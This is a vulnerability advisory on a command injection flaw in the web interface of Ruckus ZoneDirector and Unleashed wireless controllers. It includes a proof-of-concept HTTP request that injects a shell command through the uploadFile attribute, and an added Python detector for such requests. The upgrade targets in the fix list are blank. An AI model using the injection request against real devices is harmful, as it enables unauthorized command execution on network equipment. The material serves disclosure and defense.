Remote command injection via a crafted HTTP request (cmdImportAvpPort)

Aleph Research Advisory





  • ZoneDirector
  • Unleashed

Vulnerable Version

  • ZoneDirector: 9.9 and before
  • ZoneDirector: 9.10.x
  • ZoneDirector: 9.12.x
  • ZoneDirector: 9.13.x
  • ZoneDirector: 10.0.x
  • ZoneDirector: 10.1.x
  • ZoneDirector: 10.2.x
  • ZoneDirector: 10.3.x
  • Unleashed: 200.6 and before
  • Unleashed: 200.7


  • 9.10.x: Upgrade to
  • 9.12.x: Upgrade to
  • 9.13.x: Upgrade to
  • 10.0.x: Upgrade to
  • 10.1.x: Upgrade to
  • 10.2.x: Upgrade to
  • 10.3.x: Upgrade to
  • 200.6 and before: Upgrade to
  • 200.7: Upgrade to

Technical Details

Remote command injection via a crafted HTTP request, caused by insufficient input validation

The cmdImportAvpPort() function in the emfd executable calls system() with insufficient input validation on the fileUpload attribute. As a result, a crafted POST request with attribute xcmd=import-avpport to the web interface page /admin/_cmdstat.jsp injects an OS command.

Information about the exploitation of the vulnerability can be found in our blog post or the 36C3 talk.

Proof Of Concept

Jailbreaking the Ruckus CLI using this exploit

POST /tools/_cmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded charset=UTF-8
X-CSRF-Token: oaMM8EBv1Y
Content-Length: 336
Cookie: -ejs-session-=x236a14bd195e0f136942005c785bac52

<ajax-request action='docmd' xcmd='get-platform-depends' updater='system.1568118269965.3208' comp='system'> 
	<xcmd cmd='import-avpport' uploadFile='; echo "inject" >/tmp/botox'  type='wlan-maxnums'/>
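
A detection check for the request pattern above, as an added example that is not part of the original advisory or of Ruckus code: it scans a POST body sent to _cmdstat.jsp for an import-avpport command whose file attribute contains anything outside a conservative allowlist. The function names, the allowlist and the benign sample are assumptions; both attribute spellings that appear on this page (fileUpload and uploadFile) are checked.

```python
import html
import re

# name='value' or name="value"; the value may contain '>' and the other quote type.
ATTR = re.compile(r"""\s*([\w-]+)\s*=\s*(?:'([^']*)'|"([^"]*)")""")
# Assumption: a legitimate upload file name needs only these characters.
SAFE_VALUE = re.compile(r"[A-Za-z0-9._/-]*")
# The advisory text says fileUpload, the captured request uses uploadFile: check both.
FILE_ATTRS = ("uploadfile", "fileupload")

def xcmd_attrs(body):
    """Yield the attributes of every <xcmd ...> element as a dict (names lowercased).

    Attributes are walked one at a time instead of cutting the tag at the first '>',
    because an injected value can contain '>' itself, and a truncated body would
    make a strict XML parser give up before reaching the attribute.
    """
    for tag in re.finditer(r"<xcmd\b", body, re.IGNORECASE):
        attrs, pos = {}, tag.end()
        while (m := ATTR.match(body, pos)):
            attrs[m.group(1).lower()] = m.group(2) if m.group(2) is not None else m.group(3)
            pos = m.end()
        yield attrs

def check_request(path, body):
    """Return [(attribute, decoded value)] for import-avpport values outside the allowlist."""
    if not path.split("?", 1)[0].lower().endswith("/_cmdstat.jsp"):
        return []
    findings = []
    for attrs in xcmd_attrs(body):
        if attrs.get("cmd", "").lower() != "import-avpport":
            continue
        for name in FILE_ATTRS:
            value = html.unescape(attrs.get(name, ""))  # also catch entity-encoded characters
            if not SAFE_VALUE.fullmatch(value):
                findings.append((name, value))
    return findings

# Body copied from the proof of concept on this page (closing tag missing there as well).
POC_BODY = """<ajax-request action='docmd' xcmd='get-platform-depends' updater='system.1568118269965.3208' comp='system'>
	<xcmd cmd='import-avpport' uploadFile='; echo "inject" >/tmp/botox'  type='wlan-maxnums'/>"""
# Constructed benign request; the file name is a made-up sample.
BENIGN_BODY = ("<ajax-request action='docmd' comp='system'>"
               "<xcmd cmd='import-avpport' uploadFile='avpport_list.csv' type='wlan-maxnums'/>"
               "</ajax-request>")

if __name__ == "__main__":
    for label, body in (("poc", POC_BODY), ("benign", BENIGN_BODY)):
        print(label, check_request("/tools/_cmdstat.jsp", body))
```

The allowlist is deliberately strict, so file names with spaces or other punctuation are reported too; widen SAFE_VALUE only after confirming what the management interface legitimately sends.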




External References